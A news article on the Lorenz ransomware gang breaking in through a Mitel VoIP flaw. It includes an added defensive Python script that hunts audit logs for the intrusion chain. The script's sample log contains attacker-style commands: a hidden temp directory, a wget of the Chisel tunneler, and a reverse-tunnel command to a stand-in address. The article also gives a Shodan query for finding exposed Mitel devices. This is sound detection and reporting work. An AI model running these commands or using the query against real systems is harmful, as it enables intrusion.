The Lorenz ransomware gang is exploiting a vulnerability in Mitel VoIP appliances to break into corporate networks.
Threat hunters with cybersecurity firm Arctic Wolf Labs recently found that Lorenz – a prolific group active since at least early 2021 that lately has primarily targeted SMBs in the US, China, and Mexico – used a vulnerability (CVE-2022-29499) in a Mitel MiVoice VoIP appliance to get into a victim’s network, then deployed Microsoft’s BitLocker Drive Encryption tool to encrypt the data.
Shodan search to find Mitel boxes: http.html_hash:-1971546278
Presentation online has roughly doubled in 5 years.
— Kevin Beaumont (@GossiTheDog) June 24, 2022
Like many ransomware groups, Lorenz uses a double-extortion method, exfiltrating the victim’s data before encrypting the systems and threatening to publicly disclose the data if the ransom isn’t paid.
The Lorenz attackers initially got into the targeted company’s network by exploiting a remote code execution vulnerability in a Mitel appliance on the network’s perimeter. The RCE vulnerability affected the Service Appliance component of Mitel’s MiVoice Connect, a unified communications platform that brings collaboration and communications tools together in a single interface.
“It is worth noting that, after exploitation of the Mitel device, Lorenz did not immediately proceed with any further activity for about a month,” the Arctic Wolf researchers wrote, which would have given defenders time to react.
The cybercriminals obtained a reverse shell on the appliance and used Chisel, an open-source, Go-based tunneling tool, to tunnel from the compromised device into the corporate IT environment. Once on the device, they created a hidden directory and downloaded a compiled Chisel binary from GitHub using wget. From there they obtained credentials for privileged administrator accounts and moved laterally through the network over Remote Desktop Protocol (RDP).
The cybercriminals then exfiltrated data using FileZilla before encrypting the systems.
New dogs using old tricks
This isn’t the first time attackers have used the Mitel vulnerability to launch an attack. CrowdStrike analysts in a June report outlined the vulnerability and another ransomware attempt to use the flaw to gain initial access into a corporate network.
With the more recent attempt, Arctic Wolf researchers saw that the tactics used by the attackers overlapped with what CrowdStrike described regarding initial access.
In early July, Rapid7 threat hunters reported a small number of intrusions using the Mitel flaw for initial access.
While they didn’t believe a large number of the Mitel devices were exposed to the internet or that the flaw was being targeted in wide-scale ransomware campaigns, “we are conscious of the fact … that the proliferation of ransomware in general has continued to shape risk models for many organizations and that network perimeter devices are tempting targets for a variety of attackers,” they wrote.
Monitor the perimeter
“Threat actors are beginning to shift targeting to lesser known or monitored assets to avoid detection,” Arctic Wolf researchers wrote in a blog post this week.
“In the current landscape, many organizations heavily monitor critical assets, such as domain controllers and web servers, but tend to leave VoIP devices and IoT devices without proper monitoring, which enables threat actors to gain a foothold into an environment without being detected.”
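One way to put that monitoring into practice, as an added example that is not code from the original article, Arctic Wolf, or Mitel: a Python script that scans process-audit lines from a perimeter VoIP appliance for the foothold chain described earlier (a hidden directory under a temp path, a wget of a Chisel build from GitHub, Chisel started in reverse-tunnel mode) and raises one alert per host when two or more of those stages fall inside a time window. The log format, hostname, addresses, release path and sample lines are all constructed for the example; it goes slightly beyond the article in that any binary executed from a temp root is flagged, so tunnelers other than Chisel are caught by the same correlation.

```python
"""Hunt for the Chisel foothold chain in process-audit lines from a VoIP appliance.

Added example: the log format, hostname, addresses and sample lines below are
constructed for illustration and are not Mitel output or Arctic Wolf data.
"""
import re
import shlex
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed sample log (assumed "audit: uid=N cmd=..." shape, UTC ISO timestamps).
# Lines 1, 2 and 4 form the chain described in the article; line 3 is staging
# noise, line 5 is a benign firmware fetch that must not fire.
SAMPLE_LOG = """\
2022-03-18T04:12:07Z mitel-sa audit: uid=0 cmd="mkdir -p /tmp/.svc"
2022-03-18T04:12:41Z mitel-sa audit: uid=0 cmd="wget -q -O /tmp/.svc/chisel https://github.com/jpillora/chisel/releases/download/vX.Y.Z/chisel_linux_amd64"
2022-03-18T04:12:58Z mitel-sa audit: uid=0 cmd="chmod +x /tmp/.svc/chisel"
2022-03-18T04:13:10Z mitel-sa audit: uid=0 cmd="/tmp/.svc/chisel client 203.0.113.10:443 R:socks"
2022-03-18T09:30:00Z mitel-sa audit: uid=1001 cmd="wget -q -O /var/tmp/fw.bin https://updates.example.net/fw.bin"
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) (?P<host>\S+) audit: uid=(?P<uid>\d+) cmd="(?P<cmd>[^"]*)"$')
TMP_ROOTS = ("/tmp/", "/var/tmp/", "/dev/shm/")       # world-writable staging areas
HIDDEN_COMPONENT = re.compile(r"/\.[^/\s]+")           # a path component starting with "."
URL_RE = re.compile(r"^https?://([^/\s]+)", re.IGNORECASE)
FETCH_TOOLS = {"wget", "curl"}
FETCH_HOSTS = {"github.com", "objects.githubusercontent.com", "raw.githubusercontent.com"}


@dataclass(frozen=True)
class Finding:
    ts: datetime
    host: str
    uid: int
    stage: str      # hidden_dir | remote_fetch | reverse_tunnel | tmp_exec
    detail: str


def _hidden_tmp_path(arg):
    return arg.startswith(TMP_ROOTS) and HIDDEN_COMPONENT.search(arg) is not None


def classify(cmd):
    """Map one command line to (stage, detail), or None when nothing matches."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return None
    if not argv:
        return None
    prog, args = argv[0].rsplit("/", 1)[-1], argv[1:]

    if prog == "mkdir":
        hidden = [a for a in args if _hidden_tmp_path(a)]
        return ("hidden_dir", hidden[0]) if hidden else None

    if prog in FETCH_TOOLS:
        urls = [a for a in args if URL_RE.match(a)]
        from_watched_host = any(URL_RE.match(u).group(1).lower() in FETCH_HOSTS for u in urls)
        into_hidden_dir = any(_hidden_tmp_path(a) for a in args)
        return ("remote_fetch", urls[0]) if urls and (from_watched_host or into_hidden_dir) else None

    if argv[0].startswith(TMP_ROOTS):
        # Chisel reverse tunnel: "<bin> client <server> R:<remote-spec>"
        if "client" in args and any(a.startswith("R:") for a in args):
            i = args.index("client")
            return ("reverse_tunnel", args[i + 1] if i + 1 < len(args) else "?")
        return ("tmp_exec", argv[0])    # anything else run from a temp dir still deserves a look
    return None


def find_findings(log_text):
    """Parse audit lines and keep only the ones classify() flags."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        hit = classify(m["cmd"])
        if hit is None:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        findings.append(Finding(ts, m["host"], int(m["uid"]), hit[0], hit[1]))
    return findings


def correlate(findings, window_seconds=3600, min_stages=2):
    """Per host, alert once when >= min_stages distinct stages fall inside one window."""
    window = timedelta(seconds=window_seconds)
    by_host = {}
    for f in sorted(findings, key=lambda f: f.ts):
        by_host.setdefault(f.host, []).append(f)
    alerts = []
    for host, items in by_host.items():
        for i, first in enumerate(items):
            cluster = [g for g in items[i:] if g.ts - first.ts <= window]
            stages = sorted({g.stage for g in cluster})
            if len(stages) >= min_stages:
                alerts.append({"host": host, "stages": stages,
                               "first_seen": first.ts, "last_seen": cluster[-1].ts})
                break
    return alerts


if __name__ == "__main__":
    for a in correlate(find_findings(SAMPLE_LOG)):
        print(f"{a['host']}: stages={a['stages']} {a['first_seen']:%H:%M:%S}-{a['last_seen']:%H:%M:%S}")
```

Run as-is it prints the single alert for the constructed host; against a real appliance the only part that needs adapting is LINE_RE, which is tied to the assumed log shape. The benign wget on the last sample line is deliberately left un-flagged: fetching from a vendor update host into a non-hidden path is normal appliance behaviour, and a rule that fires on every wget would be muted within a week.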
Andrew Hay, COO at Lares Consulting, told The Register that as more mature organizations patch their obvious assets, threat groups will continue to look for the easiest ways into victims’ environments.
“Attackers will target the lowest hanging fruit and VoIP systems are some of the most infrequently patched assets in any organization,” he said. “This is mainly because they are thought of as ‘phones’ and not the computers they are.”
Mitel identified the flaw in April and delivered a remediation script at the time; MiVoice Connect version R19.3, which fixed the problem, followed three months later.
According to Cybereason, the Lorenz ransomware variant was first detected in February 2021 and may be a rebrand of the .sZ40 ransomware found in October 2020. It also has been linked to the ThunderCrypt ransomware first seen in 2017.
The increased targeting of VoIP appliances “will force organizations to treat all hackable devices the same from an InfoSec perspective,” IoT security shop Viakoo’s CEO Bud Broomhead told The Register.
“A device not being part of IT is no reason to treat it differently from a cyber perspective. Unless a device is given an official exemption, it should be held to the same patching, password, and security standard as servers or networking devices.”
James McQuiggan, security awareness advocate at KnowBe4, told The Register that “organizations need to ensure they have change control and patch management programs to monitor all assets for updates and implement all updates promptly to avoid potential data breaches through unpatched systems.” ®